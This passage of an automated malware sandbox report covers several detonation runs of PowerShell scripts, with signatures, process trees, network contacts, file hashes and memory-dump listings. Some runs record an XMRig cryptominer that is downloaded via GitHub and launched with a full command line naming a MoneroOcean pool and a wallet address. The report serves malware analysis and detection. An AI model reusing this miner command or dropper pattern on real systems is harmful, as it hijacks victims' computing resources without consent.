memory/1800-60-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-61-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-62-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-63-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-64-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-65-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-66-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-67-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-68-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-69-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-70-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-71-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-72-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-73-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-74-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-75-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-76-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-77-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-78-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-79-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-80-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-81-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-82-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-83-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-84-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-85-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-86-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-87-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-88-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-89-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-90-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-91-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-92-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-93-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-94-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-95-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-96-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-97-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-98-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-99-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-100-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-101-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-102-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-103-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-104-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-105-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-106-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-107-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-108-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-109-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-110-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-111-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-112-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-113-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-114-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-115-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-116-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10v2004-20240508-en
Max time kernel
1755s
Max time network
1765s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2504-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzqadwub.jvw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2504-10-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
memory/2504-11-0x000002087DC60000-0x000002087DC82000-memory.dmp
memory/2504-12-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
memory/2504-13-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
memory/2504-14-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
memory/2504-15-0x00007FFD85903000-0x00007FFD85905000-memory.dmp
memory/2504-16-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
memory/2504-17-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:17
Platform
win10v2004-20240508-en
Max time kernel
1727s
Max time network
1741s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/3276-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/3276-1-0x0000022BEE440000-0x0000022BEE462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cd4rylai.r3y.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3276-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3276-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3276-13-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3276-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3276-15-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
memory/3276-16-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
memory/3276-17-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:03
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3816 wrote to memory of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3816 wrote to memory of 1672 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
memory/3816-3-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp
memory/3816-5-0x00000227C4960000-0x00000227C4982000-memory.dmp
memory/3816-6-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/3816-9-0x00000227DCEB0000-0x00000227DCF26000-memory.dmp
memory/3816-10-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sa2whhed.bxu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3816-25-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/3816-48-0x00000227DCE50000-0x00000227DCE62000-memory.dmp
memory/3816-61-0x00000227DCE30000-0x00000227DCE3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1672-90-0x0000015BDB2B0000-0x0000015BDB2D0000-memory.dmp
memory/1672-91-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/3816-92-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/3816-94-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp
memory/1672-93-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/3816-95-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/3816-96-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp
memory/1672-97-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-98-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-99-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-100-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-101-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-102-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-103-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-104-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-105-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-106-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-107-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-108-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-109-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-110-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-111-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-112-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-113-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-114-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-115-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-116-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-117-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-118-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-119-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-120-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-121-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-122-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-123-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-124-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-125-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-126-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-127-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-128-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-129-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-130-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-131-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-132-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-133-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-134-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-135-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-136-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-137-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-138-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-139-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-140-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-141-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-142-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-143-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-144-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-145-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-146-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-147-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-148-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-149-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-150-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-151-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-152-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-153-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-154-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-155-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-156-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
memory/1672-157-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4212 wrote to memory of 4612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4212 wrote to memory of 4612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/4212-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4212-5-0x000002003F870000-0x000002003F892000-memory.dmp
memory/4212-8-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-9-0x000002003FA20000-0x000002003FA96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmahcz4d.k35.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4212-10-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-48-0x000002003FA00000-0x000002003FA12000-memory.dmp
memory/4212-61-0x000002003F9E0000-0x000002003F9EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
